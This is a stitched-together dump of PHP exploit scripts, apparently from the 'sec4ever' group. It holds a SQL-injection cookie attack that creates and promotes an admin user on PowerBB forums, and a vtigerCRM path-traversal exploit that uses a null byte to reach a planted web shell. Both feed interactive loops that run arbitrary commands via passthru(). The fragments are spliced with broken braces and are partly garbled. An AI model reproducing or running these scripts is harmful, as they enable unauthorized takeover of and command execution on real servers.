$string = " " . $string;
$ini = strpos($string, $start);
if ($ini == 0) {
return "";
}
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
$vic = str_replace('http://', '', trim(fgets(STDIN)));
if ($vic == '') {
exit;
}
$log = fopen('faris.txt', 'w+');
$ran = rand(10000, 20000);
echo "| Adding New User\n";
$add = get($vic . '/admin.php?page=member&add=1&start=1', "username=f4ris_{$ran}&password=sec4ever1337s&email=n0p1337_{$ran}@gmail.com&gender=m&submit=%D9%85%D9%88%D8%A7%D9%81%D9%82", "PowerBB_admin_username=faris' or id='1; PowerBB_admin_password=faris' or password like '%;PowerBB_username=faris' or id='1;PowerBB_password=faris' or password like '%");
$myid = kastr($add, 'main=1&id=', '">');
if ($myid == '') {
exit("| Exploitation Failed\n - Magic_Quotes Maybe on or wrong path\n+ Exit");
}
echo "| User Data :\n + UserName : f4ris_{$ran}\n + Password : sec4ever1337s\n + User ID : {$myid}\n";
echo "| Updating User privileges\n";
$update = get($vic . "admin.php?page=member&edit=1&start=1&id={$myid}", "username=f4ris_{$ran}&new_username=f4ris_{$ran}&new_password=sec4ever1337s&email=n0p1337_{$ran}@gmail.com&usergroup=1&gender=m&style=1&lang=1&avater_path=&user_info=&user_title=F4r54wy&posts=0&website=sec4ever.com&month=0&day=0&year=&user_country=&ip=&warnings=0&reputation=10&hide_online=0&user_time=&send_allow=1&pm_emailed=0&pm_window=1&visitormessage=1&user_sig=&review_subject=0&review_reply=0&submit=%D9%85%D9%88%D8%A7%D9%81%D9%82", "PowerBB_admin_username=faris' or id='1; PowerBB_admin_password=faris' or password like '%;PowerBB_username=faris' or id='1;PowerBB_password=faris' or password like '%");
echo "+ Exploitatin Done ;)\n";
exit;
?>
}
echo "| sec4ever shell online ;)\n";
/*
if passthru() is enabled , then get small command executer
using Egix fsock method to send and retrieve data
*/
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
fputs($sock, $packet);
return stream_get_contents($sock);
}
$packet = "GET /{$path}/pages.php?pageid={$myid} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while (1) {
print "\ni-Hmx@" . $_SESSION['host'] . "# ";
if (($fa = trim(fgets(STDIN))) == "exit") {
exit("\n+ Exiting");
}
$response = http_send($host, sprintf($packet, base64_encode($fa)));
$final = kastr($response, "faris>>>", "<<<faris");
echo $final;
}
/*
woooooow , that really f****d my mind
But it was funny :D
Greets to all sec4ever members
C u Guys in another Bomb ;)
*/
return substr($string, $ini, $len);
}
$me = faget($target . "/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../cache/import/IMPORT_%00", "");
echo "| Testing total payload\n";
$total = faget($target . "/vtigercrm/farsawy.php", "pwd=1337");
if (!eregi("Faris on the mic :D", $total)) {
die("[+] Exploitation Failed\n");
}
echo "| Sending CMD test package\n";
$cmd = faget($target . "/vtigercrm/farsawy.php", "pwd=1337&fa=cGFzc3RocnUoJ2VjaG8gZmFyc2F3eScpOw==");
if (!eregi("farsawy", $cmd)) {
echo " + Cmd couldn't executed but we can evaluate php code\n + use :\r\n{$target}//vtigercrm/fa.php\n Post : fa=base64code\n";
}
echo "| sec4ever shell online ;)\n\n";
$host = str_replace('https://', '', $target);
while (1) {
echo "i-Hmx@{$host}# ";
$c = trim(fgets(STDIN));
if ($c == 'exit') {
die("[+] Terminating\n");
}
$payload = base64_encode("passthru('{$c}');");
$f**k = faget($target . "/vtigercrm/farsawy.php", "pwd=1337&fa={$payload}");
$done = kastr($f**k, "-----------------", "-----------------");
echo "{$done}\n";
}
/*
I dont even remember when i exploited this shit!
maybe on 2013?!
whatever , Hope its not sold as 0day in the near future xDD
*/
